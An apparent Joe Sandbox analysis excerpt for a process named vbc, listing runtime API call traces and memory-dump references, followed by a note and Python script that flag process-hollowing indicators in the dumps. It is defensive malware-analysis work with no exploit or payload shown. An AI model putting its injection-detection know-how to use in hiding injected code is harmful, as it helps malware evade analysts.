• TerminateProcess.KERNEL32(00000000,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002,00000000,?,00D52038,00000003), ref: 00D53F65
• ExitProcess.KERNEL32 ref: 00D53F77
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: a6b3346ea0f66fbdc4a242b10ce96f3fcbdf82fcfd0476ccc5d71839038e4aab
• Instruction ID: ed3229ade8d36c7ea78ffbee8ffbcd3eab820c0ff849659881dd3b688960e556
• Opcode Fuzzy Hash: a6b3346ea0f66fbdc4a242b10ce96f3fcbdf82fcfd0476ccc5d71839038e4aab
• Instruction Fuzzy Hash: DAE04631404B08ABCF016F2DDC08A593B39EF44383F044018FC058B222CB39DE56CAB0

Memory Dump Source
• Source File: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                                                                      • Instruction ID: 41e836234758a3a873b0eb107039dab30ed17283a8094f1e23a75907f2704711
                                                                                                                                                                      • Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                                                                      • Instruction Fuzzy Hash: E931A02190A244BACE32BE1C981467F7B649B65F77F190D97E44066392F22D8F44936C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
• Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
• Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
• Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID:
• String ID: d$w
• API String ID: 0-2400632791
• Opcode ID: 264be9a040329af85821a298646ca79b47df90acc0ff67c2c7dab0ac9cff9d18
• Instruction ID: 4b94060673c04e2630504e1e7cc5525d4beafb7bbad99c002421bda83c41a385
• Opcode Fuzzy Hash: 264be9a040329af85821a298646ca79b47df90acc0ff67c2c7dab0ac9cff9d18
• Instruction Fuzzy Hash: 78C12362A3C340AECA3557288C1AB763B649B61770F4C3196FA95F60F3D755AC08A732
APIs
• ___free_lconv_mon.LIBCMT ref: 00D52543
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53090
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530A2
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530B4
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530C6
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530D8
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530EA
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D530FC
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D5310E
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53120
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53132
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53144
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53156
  • Part of subcall function 00D53073: _free.LIBCMT ref: 00D53168
• _free.LIBCMT ref: 00D52538
  • Part of subcall function 00D52096: HeapFree.KERNEL32(00000000,00000000,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?), ref: 00D520AC
  • Part of subcall function 00D52096: GetLastError.KERNEL32(?,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?,?), ref: 00D520BE
• _free.LIBCMT ref: 00D5255A
• _free.LIBCMT ref: 00D5256F
• _free.LIBCMT ref: 00D5257A
• _free.LIBCMT ref: 00D5259C
• _free.LIBCMT ref: 00D525AF
• _free.LIBCMT ref: 00D525BD
• _free.LIBCMT ref: 00D525C8
• _free.LIBCMT ref: 00D52600
• _free.LIBCMT ref: 00D52607
• _free.LIBCMT ref: 00D52624
• _free.LIBCMT ref: 00D5263C
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 717549f5622e2730353b043ce6f38bbcb63c982a7e9777203f386abd2db88767
• Instruction ID: 720878af43a6430775b64a497160732ba3e95374e72187018ff23ba9fecf5115
• Opcode Fuzzy Hash: 717549f5622e2730353b043ce6f38bbcb63c982a7e9777203f386abd2db88767
• Instruction Fuzzy Hash: EC311A71A007059BEF31AA78D845B66B3E9FB02352F184429EC5AD7191EE71ED8CCB30
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D58311,?,00000000,?,00000000,00000000), ref: 00D57BDE
                                                                                                                                                                      • __fassign.LIBCMT ref: 00D57C59
                                                                                                                                                                      • __fassign.LIBCMT ref: 00D57C74
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D57C9A
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00D58311,00000000,?,?,?,?,?,?,?,?,?,00D58311,?), ref: 00D57CB9
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00D58311,00000000,?,?,?,?,?,?,?,?,?,00D58311,?), ref: 00D57CF2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                      • Opcode ID: 0c907ee0a317d17608f1e5af4edf363380f5a39cb0587f9ec3ef9cb7410d2e93
                                                                                                                                                                      • Instruction ID: 1c292177a7f5b8687450b824f7aaafd5fd1855c6586f7ab18d2d0bb7827509d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 0c907ee0a317d17608f1e5af4edf363380f5a39cb0587f9ec3ef9cb7410d2e93
                                                                                                                                                                      • Instruction Fuzzy Hash: A6517071A043499FCF10CFA8E885AEEBBF4EF09301F24455AED59E7291E6309945CBB1
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00D531DA: _free.LIBCMT ref: 00D53203
                                                                                                                                                                      • _free.LIBCMT ref: 00D53264
                                                                                                                                                                        • Part of subcall function 00D52096: HeapFree.KERNEL32(00000000,00000000,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?), ref: 00D520AC
                                                                                                                                                                        • Part of subcall function 00D52096: GetLastError.KERNEL32(?,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?,?), ref: 00D520BE
                                                                                                                                                                      • _free.LIBCMT ref: 00D5326F
                                                                                                                                                                      • _free.LIBCMT ref: 00D5327A
                                                                                                                                                                      • _free.LIBCMT ref: 00D532CE
                                                                                                                                                                      • _free.LIBCMT ref: 00D532D9
                                                                                                                                                                      • _free.LIBCMT ref: 00D532E4
                                                                                                                                                                      • _free.LIBCMT ref: 00D532EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                      • Instruction ID: e8d9b8a5c2236fcaf7743f33c9878cb621996e1dd84f888cf7ce537210261c51
                                                                                                                                                                      • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                      • Instruction Fuzzy Hash: 0711FC72A41B04AADD30FBB0CC07FDB779CEF06742F444C15BE9AA6092DA65A60C8770
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno$__lock_file
                                                                                                                                                                      • String ID: 'B
                                                                                                                                                                      • API String ID: 90028640-2787509829
                                                                                                                                                                      • Opcode ID: 1f8bbaa44f9990446b1d1c28f2d2b7d5c9b6dbab54d1b4072eff8aa4ab07f8e7
                                                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f8bbaa44f9990446b1d1c28f2d2b7d5c9b6dbab54d1b4072eff8aa4ab07f8e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00D5473A,?,?,00000000), ref: 00D54543
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00D5473A,?,?,00000000,?,?,?), ref: 00D545C9
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D546C3
                                                                                                                                                                      • __freea.LIBCMT ref: 00D546D0
                                                                                                                                                                        • Part of subcall function 00D532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00D5332C
                                                                                                                                                                      • __freea.LIBCMT ref: 00D546D9
                                                                                                                                                                      • __freea.LIBCMT ref: 00D546FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                      • Opcode ID: 698df1f396da2bea8904455cf12f3969361dbed8d64705e2c0897ff5682954e0
                                                                                                                                                                      • Instruction ID: 76a89ee7510d6bb6bf88afd23dd8eba1d208bb24927589d13020d64ace4d5809
                                                                                                                                                                      • Opcode Fuzzy Hash: 698df1f396da2bea8904455cf12f3969361dbed8d64705e2c0897ff5682954e0
                                                                                                                                                                      • Instruction Fuzzy Hash: D051DE72600216ABEF259E64CC42FEF77A9EB4575AF194228FC04D7180EB34DC98C672
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,?,?,0040D128,00000001,?,?,?,?,?,0040AF59,?), ref: 0040B8C4
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 680241177-0
                                                                                                                                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                      • Opcode ID: b7a27c4b46560a695bb69038e9be032888963ea972be329fe2c6b487936acdfc
                                                                                                                                                                      • Instruction ID: 9379a8a13df0f2fe860297f5e164dd141d5f5dab13f49a7ff03025da0e6d7443
                                                                                                                                                                      • Opcode Fuzzy Hash: b7a27c4b46560a695bb69038e9be032888963ea972be329fe2c6b487936acdfc
                                                                                                                                                                      • Instruction Fuzzy Hash: 22F06D3A1057107ACE2127396C0AF3A1A569BC2763F284225FD19D6292EE66880E8135
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D53F73,00000003,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002), ref: 00D53FE2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D53FF5
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D53F73,00000003,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002,00000000), ref: 00D54018
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 28f3adbafb54f5b648f3a6a9099af8aac511fbfb631caa3c32c464b8937a4660
                                                                                                                                                                      • Instruction ID: 5c2fcfc85b42ea021519f1848f3e0d4248e9c742a0361531f5d6fdeb41cf67f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 28f3adbafb54f5b648f3a6a9099af8aac511fbfb631caa3c32c464b8937a4660
                                                                                                                                                                      • Instruction Fuzzy Hash: 33F03130910718ABCB119B98DC0ABADBFB5EB44757F140154ED09E6290DB749A88DAB1
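The two "Memory Dump Source" lines above (the PE-backed region at 0x400000 and the non-PE region at 0xD10000, both in the same process) are the part of this listing an analyst actually triages: an executable/writable private region that carries a PE header but is not backed by a mapped image is the memory-level signature of process hollowing or manual PE mapping. The following Python is an added example, not Joe Sandbox code, that decodes those lines and applies that rule. The field layout of the .sdmp name (pid . run . dump-id . base . protect . three trailing words) is an assumption inferred from this report: the first field decodes to 42 and the base to 0x400000, which is what the adjacent snapshot name hcaresult_42_2_400000_vbc.jbxd says, and the cross-check below enforces that agreement. The PAGE_* and MEM_* values are the winnt.h constants; the trailing words are decoded by bit value only, so a word the report uses for something else simply stays unnamed. The two sample lines are copied from this page; the snapshot name is as well.

```python
import re
from dataclasses import dataclass

# Page-protection and region-type constants from winnt.h (exact values).
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", PAGE_EXECUTE: "PAGE_EXECUTE",
    PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
TYPE_FLAGS = ((MEM_COMMIT, "MEM_COMMIT"), (MEM_PRIVATE, "MEM_PRIVATE"),
              (MEM_MAPPED, "MEM_MAPPED"), (MEM_IMAGE, "MEM_IMAGE"))
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE_EXEC = {PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# ASSUMED layout of a Joe Sandbox .sdmp name, inferred from this report:
#   pid(hex) . run(hex) . dump-id(dec) . base(hex) . protect(hex) . w1 . w2 . w3
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"
)
# ASSUMED layout of the IDA-plugin snapshot name: hcaresult_<pid>_<run>_<base>_<image>.jbxd
SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(\w+)\.jbxd$")

@dataclass(frozen=True)
class DumpRegion:
    pid: int
    run: int
    dump_id: int
    base: int
    protect: int
    words: tuple      # the three trailing 32-bit words, kept raw
    is_pe: bool       # the report's "based on PE" flag

def parse_source_line(line: str) -> DumpRegion:
    """Decode one 'Source File: ... .sdmp, Offset: ..., based on PE: ...' line."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError("not a Source File line: %r" % line)
    name, offset, pe = m.groups()
    f = SDMP_RE.match(name)
    if not f:
        raise ValueError("unexpected .sdmp name: %r" % name)
    base = int(f.group(4), 16)
    if base != int(offset, 16):   # the name and the Offset column must agree
        raise ValueError("base in name (%#x) != Offset (%s)" % (base, offset))
    return DumpRegion(
        pid=int(f.group(1), 16), run=int(f.group(2), 16), dump_id=int(f.group(3)),
        base=base, protect=int(f.group(5), 16),
        words=tuple(int(f.group(i), 16) for i in (6, 7, 8)), is_pe=(pe == "true"),
    )

def snapshot_matches(r: DumpRegion, snapshot: str) -> bool:
    """Cross-check the decoded pid/run/base against the IDA-plugin snapshot name."""
    m = SNAP_RE.match(snapshot)
    return bool(m) and (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == (r.pid, r.run, r.base)

def describe(r: DumpRegion) -> str:
    """Human-readable protection and region-type names; unknown words stay unnamed."""
    names = [PROTECT_NAMES.get(r.protect, hex(r.protect))]
    names += [nm for w in r.words for val, nm in TYPE_FLAGS if w & val]
    return "pid %d run %d base %#x: %s" % (r.pid, r.run, r.base, " | ".join(names))

def triage(r: DumpRegion) -> list:
    """Heuristic injection indicators for one dumped region (order is fixed)."""
    private = any(w & MEM_PRIVATE for w in r.words)
    image = any(w & MEM_IMAGE for w in r.words)
    findings = []
    if r.protect in WRITABLE_EXEC:
        findings.append("rwx")
    if r.is_pe and private and not image:
        findings.append("pe-in-private-memory")   # PE header present, no image-section backing
    if r.is_pe and r.base == 0x400000:
        findings.append("default-image-base")     # default 32-bit EXE image base
    if r.protect in EXECUTABLE and private and not r.is_pe:
        findings.append("unbacked-executable")    # executable private region with no PE header
    return findings

# Sample input copied from this report page.
SAMPLE_LINES = [
    "• Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true",
    "• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        region = parse_source_line(line)
        print(describe(region), "->", ", ".join(triage(region)) or "nothing flagged")
```

For this page the first region decodes as PAGE_EXECUTE_READWRITE | MEM_PRIVATE with a PE header at the default image base, and the second as a committed, private, RWX region without one; the first is the stronger indicator, because a legitimately loaded executable lives in MEM_IMAGE memory with its sections split into distinct protections.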
                                                                                                                                                                      APIs
